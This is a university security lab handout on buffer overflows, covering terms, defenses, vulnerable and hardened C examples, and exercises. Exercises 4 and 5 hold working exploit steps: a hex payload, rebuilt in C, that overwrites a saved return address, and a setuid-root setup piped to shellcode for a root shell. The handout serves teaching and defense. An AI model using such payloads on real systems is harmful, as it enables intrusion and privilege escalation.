Academic year: 2020

Security Lab 8: Buffer Overflow

Name:

Date:

Introduction

Buffer overflows represent a significant security threat to systems. This lab organizes resources and exercises to help students understand buffer overflows and the countermeasures used against them.

Vocabulary Review

Buffer Overflow: A condition at an interface under which more input can be placed into a buffer or data holding area than the capacity allocated, overwriting other information. Attackers exploit such a condition to crash a system or to insert specially crafted code that allows them to gain control of the system. Also known as buffer overruns.

Stack Buffer Overflow: A buffer overflow that affects a buffer located on the stack, usually as a local variable in a function’s stack frame. This is also referred to as stack smashing.

Stack Frame: A structure saved on the stack that stores the return address, parameters, local variables, and registers associated with a function.

Shellcode: code supplied by the attacker and often saved in the buffer being overflowed. Traditionally, its function was to transfer control to a user command-line interpreter, or shell, which gave access to any program available on the system with the privileges of the attacked program.

NOP sled: A technique used to deal with the inability to precisely determine the starting address of the shellcode in memory. The attacker pads the shellcode with NOP (no operation) instructions and places the actual content of the shellcode at the end of the buffer. No matter where in the NOP sled the actual target address is, the computer will run through the remaining NOPs, doing nothing, until it reaches the start of the real


Compile-Time Defenses: Compile-time defenses aim to prevent or detect buffer overflows by hardening programs when they are built. The following are all compile-time defenses against buffer overflows:

1) Develop software in a high-level language that does not permit buffer overflows.

2) Use safe coding techniques such as explicit bounds checking on every copy into a fixed-size buffer.

3) Use safe libraries, that is, bounded string and memory functions in place of gets, strcpy and similar routines that trust the caller's buffer to be large enough.

4) Use stack protection mechanisms such as StackGuard, which places a canary value between the local variables and the saved return address and aborts the program if the canary has been modified by the time the function returns.

The disadvantage of all of these techniques is that they require the source code to be available and recompiled, so they do nothing for binaries that already exist.
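As an added example (not part of the lab's buffer1 to buffer4 sources), the following C program is a miniature version of the StackGuard idea described in item 4. The struct stands in for a function's stack frame: an 8-byte local buffer followed immediately by a canary word. An unchecked copy into the buffer spills over the canary, and an "epilogue" check catches it before anything trusts the frame. The canary value and the struct layout are assumptions made for the demonstration; a real compiler (for example gcc with -fstack-protector) picks a random canary per process and places it between the locals and the saved return address.

```c
/* Added example: a hand-rolled stack canary. Not the lab's code. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define CANARY 0xDEADC0DEu   /* fixed for the demo; real implementations use a random per-process value */

struct frame {
    char     buf[8];         /* the vulnerable local buffer */
    uint32_t canary;         /* guard word placed directly after it */
};

/* Simulates an unchecked strcpy()/gets() into buf: copies the whole input regardless of
 * how long it is. The copy is clamped to the struct so that the demonstration itself
 * stays within defined behaviour; a real strcpy would keep writing past the frame. */
static void unsafe_copy(struct frame *f, const char *input)
{
    size_t n = strlen(input) + 1;            /* include the terminating NUL */
    if (n > sizeof *f)
        n = sizeof *f;
    memcpy(f, input, n);
}

/* The bounded replacement: copies at most sizeof buf - 1 bytes and always terminates.
 * Returns 1 if the input had to be truncated, so a caller can reject it instead. */
static int safe_copy(struct frame *f, const char *input)
{
    size_t len  = strlen(input);
    size_t room = sizeof f->buf - 1;
    size_t n    = len < room ? len : room;
    memcpy(f->buf, input, n);
    f->buf[n] = '\0';
    return len > room;
}

/* The "function epilogue" check: 0 if the canary is intact, 1 if the frame was smashed. */
static int canary_tripped(const struct frame *f)
{
    return f->canary != CANARY;
}

/* Runs one input through either copy routine and reports whether the canary survived.
 * Returns 1 when an overflow was detected, 0 when the frame is intact. */
int run_frame(const char *input, int use_safe_copy)
{
    struct frame f;
    memset(&f, 0, sizeof f);
    f.canary = CANARY;                        /* prologue: arm the canary */
    if (use_safe_copy)
        safe_copy(&f, input);
    else
        unsafe_copy(&f, input);
    return canary_tripped(&f);                /* epilogue: verify before returning */
}

int main(void)
{
    /* constructed inputs: fits, exactly fills the buffer, overflows it */
    const char *inputs[] = { "start", "badinput", "badinputbadinput" };
    for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++) {
        printf("%-18s unchecked copy: %-22s bounded copy: %s\n", inputs[i],
               run_frame(inputs[i], 0) ? "canary smashed, abort" : "ok",
               run_frame(inputs[i], 1) ? "canary smashed, abort" : "ok");
    }
    return 0;
}
```

Note that an input of exactly eight characters also trips the canary: the terminating NUL is the ninth byte written, and it lands on the guard word. That off-by-one is exactly the kind of overflow the lab's 8-character buffers invite, and it is why the bounded copy reserves one byte for the terminator.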

Run-Time Defenses: Run-time defenses aim to detect and abort attacks on existing programs without recompiling them. These defenses involve changes to the memory management of the virtual address space of processes. The following are all run-time defenses against buffer overflows:

1) Executable address space protection: tag pages in virtual memory as non-executable, so that shellcode written into a stack or heap buffer cannot be run.

2) Address space randomization (ASLR): place the stack, heap and libraries at different addresses each time a program runs, so that the attacker cannot predict the addresses an exploit needs.

3) Guard pages: separate critical regions of memory with unmapped pages, so that an overflow running into them causes a fault instead of silent corruption.

The disadvantages of these techniques are that they depend on support from the hardware (for example a no-execute bit in the page tables), from the operating system and, in some cases, from the compiler and linker.

Defensive Programming: a form of defensive design intended to ensure the continuing function of a piece of software in spite of unforeseeable usage of said software. Also known as secure programming.

Injection Attack: a wide variety of program flaws related to invalid handling of input data.

Command Injection: an injection attack in which attacker-supplied input is used to construct a command that is subsequently executed by the system with the privileges of the vulnerable program (typically the Web server).


Code Injection: an injection attack that includes code that is then executed by the attacked system.

Cross-site Scripting (XSS): a vulnerability that concerns input provided to a program by one user that is subsequently output to another user. The vulnerability involves the inclusion of script code in the HTML content of a Web page displayed by a user's browser. XSS attacks illustrate a failure to handle both program input and program output correctly.

Fuzzing: a software testing technique that feeds randomly generated or mutated data to a program as input and watches for crashes or other misbehaviour.

Race Condition: when multiple processes and threads compete to gain uncontrolled access to some resource.

Deadlock: when an incorrect sequence of synchronization primitives results in processes waiting indefinitely for resources held by other processes.

Memory Leak: when a program fails to free memory it no longer needs, so the available memory on the heap steadily shrinks until it is completely exhausted.

Environment Variables: a collection of string values inherited by each process from its parent that can affect the way a running process behaves. The PATH environment variable is an important example.

Privilege Escalation: when an attacker is able to execute code with the privileges and access rights of a compromised program or service that has privileges greater than those already available to the attacker.

Least Privilege: programs should execute with the least amount of privileges needed to complete their function.


The Shortest C Primer in the World

In order to complete the buffer overflow exercises, we must use the C programming language. For the most part, you will not have to type the programs yourself, but you will have to compile and run them. This primer aims to provide you with the bare minimum you need to compile and run C programs on your Linux workstation.

Compiling C Source Code

Compiling C source is fairly straightforward. If you have a C source file called HelloWorld.c, then you will simply type:

cc -o HelloWorld HelloWorld.c

This command will produce a file named HelloWorld that is simply the compiled version of your source code file.

Running Compiled C Code

In order to run the HelloWorld program, simply type:

./HelloWorld

Unix Commands for Program Execution

In order to recreate some of these security scenarios, we will need to alter file permissions and ownership in the Linux filesystem.

chmod changes the permissions of a file. In the mode below, the leading 4 sets the setuid bit, so the program runs with the privileges of the file's owner rather than those of the user who started it; 755 gives the owner read, write and execute permission and everyone else read and execute permission:

chmod 4755 buffer4

chown changes the owner of a file:

sudo chown root buffer4


Exercise 1: Finding Vulnerable Applications

Virtually all applications of any size have vulnerabilities. These vulnerabilities are generally reported publicly by government agencies, private security groups, and vendors. Take five minutes to review the vulnerabilities listed on these websites. In the space below, list and identify the different types of vulnerabilities revealed on the websites. (The addresses below date from when the lab was written; the organizations still publish advisories, but the pages may have moved.)

US Computer Emergency Readiness Team (US-CERT) Technical Alerts:
http://www.us-cert.gov/cas/techalerts/index.html

Microsoft Security Advisories:
http://www.microsoft.com/technet/security/advisory/default.mspx

SANS (SysAdmin, Audit, Network, Security) Top 25 Programming Errors:
http://www.sans.org/top25errors/

List examples of the vulnerabilities found below.


Exercise 2: Reading Bug Reports

The advisories reviewed above almost always eventually point to bug reports that identify the specific causes of the errors. We will consider two different bug reports in this exercise: an open source report and a report for proprietary software.

Mozilla Bug Report:

https://bugzilla.mozilla.org/show_bug.cgi?id=485217

What was the problem encountered in the software? Was the problem the result of programmer error?

Microsoft Bug Report:

http://www.microsoft.com/technet/security/bulletin/MS09-013.mspx

What was the problem encountered in the software? Was the problem the result of programmer error?

Compare the two bug reports. How do they compare in transparency, quality of information, and clarity?


Exercise 3: Buffer Overflow Example

1) Compile buffer1.c

cc -o buffer1 buffer1.c

What warning messages does the compiler produce?

2) Run buffer1 from the command line:

./buffer1

3) The buffer1 program accepts two strings from the user and compares them. If the strings are equal the program returns 1, otherwise it returns 0. Enter the word start for both input strings. Does the program return the correct result?

Enter the word start for the first string and end for the second string. Does the program return the correct result?

4) The buffers in buffer1 hold only 8 characters each. The buffer overflow occurs when we enter a string longer than 8 characters: the extra characters are written past the end of the buffer into whatever the compiler placed next to it in memory.

Enter the word start for the first string and the phrase badinputbadinput for the second string.

Does the program return the correct result? If not, why not?

5) Enter the word start for the first string and the phrase evilinputevilinput for the second string.
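The source of buffer1.c is not reproduced on this page, so the following is a constructed illustration of the mechanism behind steps 4 and 5, written for this lab and not taken from it. It places an 8-byte buffer and the comparison result next to each other, the way a compiler may lay out two locals (the struct fixes the order so the demonstration is deterministic). An unchecked copy of a 16-character second string runs off the end of the buffer and overwrites the result variable, so the program reports "equal" for strings that are not. The hardened version uses a bounded read and refuses over-long input rather than silently truncating it. BUFLEN, the struct layout and the function names are assumptions of this example.

```c
/* Added example: why buffer1 can report "equal" for unequal strings. Not the lab's code. */
#include <stdio.h>
#include <string.h>

#define BUFLEN 8

/* Vulnerable version. Intended contract: returns 1 if a and b are equal, else 0. */
int compare_vulnerable(const char *a, const char *b)
{
    struct locals {
        char buf[BUFLEN];       /* where the second string is stored */
        int  equal;             /* result flag, adjacent in memory */
    } l;
    l.equal = 0;

    /* Stands in for gets()/strcpy() into l.buf: copies the whole string regardless of
     * BUFLEN. Clamped to the struct so the demo stays within defined behaviour; a real
     * strcpy would continue into the saved registers and the return address. */
    size_t n = strlen(b) + 1;
    if (n > sizeof l)
        n = sizeof l;
    memcpy(&l, b, n);           /* bytes 8.. of a long input land in l.equal */

    if (strncmp(a, l.buf, BUFLEN) == 0)
        l.equal = 1;
    return l.equal != 0;        /* any non-zero garbage is reported as "equal" */
}

/* Hardened version: bounded copy and explicit rejection of input that does not fit.
 * Returns 1 if equal, 0 if not, -1 if b is too long for the buffer. */
int compare_hardened(const char *a, const char *b)
{
    char buf[BUFLEN];
    size_t len = strlen(b);
    if (len >= sizeof buf)      /* leave room for the terminator */
        return -1;
    memcpy(buf, b, len + 1);
    return strcmp(a, buf) == 0;
}

/* Reads one line with a bounded read and strips the newline; returns 0 on EOF. */
static int read_line(const char *prompt, char *out, size_t cap)
{
    printf("%s", prompt);
    fflush(stdout);
    if (!fgets(out, (int)cap, stdin))
        return 0;
    out[strcspn(out, "\n")] = '\0';
    return 1;
}

int main(void)
{
    char first[64], second[64];
    if (!read_line("First string: ", first, sizeof first) ||
        !read_line("Second string: ", second, sizeof second))
        return 1;
    printf("vulnerable compare: %d\n", compare_vulnerable(first, second));
    printf("hardened compare:   %d\n", compare_hardened(first, second));
    return 0;
}
```

With start and badinputbadinput the vulnerable comparison answers 1: the bytes "badi" land on the result variable, and the program never notices that the strings differ. The hardened comparison answers -1 for the same input, which is the behaviour you want from a program whose buffer is smaller than what the user typed.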


Exercise 4: Stack Overflow Examples

1) Compile buffer2.c

cc -o buffer2 buffer2.c

2) Run the buffer2 program:

./buffer2

3) Enter a short name like jason. What does the program do?

4) Enter a long string of 32 Xs:

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

What does the program do?

5) Pipe the output of a perl program into buffer2. The pack("H*", ...) call turns the hex string into raw bytes, so the input can contain byte values that cannot be typed at the keyboard:

perl -e 'print pack("H*", "41424344454647485152535455565758616263646566676808fcffbf948304080a4e4e4e4e4e0a");' | ./buffer2
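The hex string in step 5 is opaque as written. The following C program, added here and not part of the lab, produces exactly the same bytes as the perl one-liner but spells out the structure. The interpretation of the fields is an inference from the byte offsets, not something the lab states: the first 24 bytes are filler that fills buffer2's local buffer, the next 4 bytes land on the saved frame pointer and the 4 after that on the saved return address, both written little-endian as an i386 CPU reads them. The value 0x08048394 sits in the range where a non-PIE Linux/i386 executable's code is loaded, and 0xbffffc08 is a typical address near the top of a pre-ASLR i386 stack; both are read directly from the lab's string. The function names are assumptions of this example.

```c
/* Added example: a readable equivalent of perl -e 'print pack("H*", ...)' from step 5. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Values taken from the lab's hex string, read as little-endian 32-bit words. */
#define SAVED_EBP 0xbffffc08u   /* assumed: overwrites the saved frame pointer */
#define RET_ADDR  0x08048394u   /* assumed: overwrites the saved return address */

/* Writes a 32-bit value in little-endian byte order. */
static void le32(uint8_t *out, uint32_t v)
{
    out[0] = (uint8_t)(v);
    out[1] = (uint8_t)(v >> 8);
    out[2] = (uint8_t)(v >> 16);
    out[3] = (uint8_t)(v >> 24);
}

/* Builds the payload into out (capacity cap). Returns its length, or 0 if cap is too small. */
size_t build_payload(uint8_t *out, size_t cap)
{
    /* 24 filler bytes: ABCDEFGH QRSTUVWX abcdefgh. Distinct letters rather than all Xs,
     * so that in a debugger you can see which part of the input ended up where. */
    static const char filler[] = "ABCDEFGHQRSTUVWXabcdefgh";
    /* newline ends the first read; the remaining bytes feed any later read the program does */
    static const char tail[]   = "\nNNNNN\n";
    size_t n = 0;
    if (cap < 24 + 4 + 4 + (sizeof tail - 1))
        return 0;
    memcpy(out + n, filler, 24);            n += 24;
    le32(out + n, SAVED_EBP);               n += 4;
    le32(out + n, RET_ADDR);                n += 4;
    memcpy(out + n, tail, sizeof tail - 1); n += sizeof tail - 1;
    return n;
}

/* Decodes a hex string the way perl's pack("H*", ...) does. Returns the byte count,
 * or 0 if the string has odd length, contains a non-hex digit, or does not fit. */
size_t hex_decode(const char *hex, uint8_t *out, size_t cap)
{
    size_t len = strlen(hex), n = 0;
    if (len % 2)
        return 0;
    for (size_t i = 0; i < len; i += 2, n++) {
        unsigned int byte;
        if (n >= cap || sscanf(hex + i, "%2x", &byte) != 1)
            return 0;
        out[n] = (uint8_t)byte;
    }
    return n;
}

/* Returns 1 if build_payload() and the lab's one-liner produce identical bytes. */
int payload_matches_lab_hex(void)
{
    static const char lab_hex[] =
        "41424344454647485152535455565758616263646566676808fcffbf948304080a4e4e4e4e4e0a";
    uint8_t a[64], b[64];
    size_t na = build_payload(a, sizeof a);
    size_t nb = hex_decode(lab_hex, b, sizeof b);
    return na != 0 && na == nb && memcmp(a, b, na) == 0;
}

/* Inspection helpers: total payload length, and byte i of the payload (0 if out of range). */
size_t payload_length(void) { uint8_t p[64]; return build_payload(p, sizeof p); }
unsigned payload_byte(size_t i) { uint8_t p[64]; size_t n = build_payload(p, sizeof p); return i < n ? p[i] : 0; }

int main(void)
{
    uint8_t payload[64];
    size_t n = build_payload(payload, sizeof payload);
    fwrite(payload, 1, n, stdout);   /* usage: ./payload | ./buffer2, like the perl pipeline */
    return 0;
}
```

Compile it with cc -o payload payload.c and run ./payload | ./buffer2 in place of the perl command. The addresses only make sense for a 32-bit binary running on a stack that is not randomized; on a current 64-bit distribution the program would have to be built with -m32 -fno-stack-protector -z execstack, run with ASLR disabled (for example under setarch -R), and the two addresses re-derived with a debugger for that binary.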


Exercise 5: Stack Overflow Attack

Because this exercise deliberately creates a program that runs as root for any user, carry it out only on a disposable lab machine or virtual machine, and remove the setuid bit (or delete the binary) when you are finished.

1) Compile buffer4.c

cc -o buffer4 buffer4.c

2) Change the owner of the buffer4 program to root:

sudo chown root buffer4

3) Run the following command to make buffer4 a setuid program that runs as root no matter who starts it:

sudo chmod 4755 buffer4

4) Review the shellcode contained in attack1:

cat ./attack1

5) Type the following command to execute the attack. If it succeeds, the shell that the shellcode spawns inherits the root privileges of buffer4:

./attack1 | ./buffer4


Discussion

What do buffer overflows and software errors in general say about the role of maintenance in software security?

Conclusion

This lab outlined some basic experiments with buffer overflows. Programming errors of this kind are a significant threat to the security of IT systems.

Resources

http://www.us-cert.gov/cas/techalerts/index.html

http://www.microsoft.com/technet/security/advisory/default.mspx

https://bugzilla.mozilla.org/show_bug.cgi?id=485217

http://www.sans.org/top25errors/

References
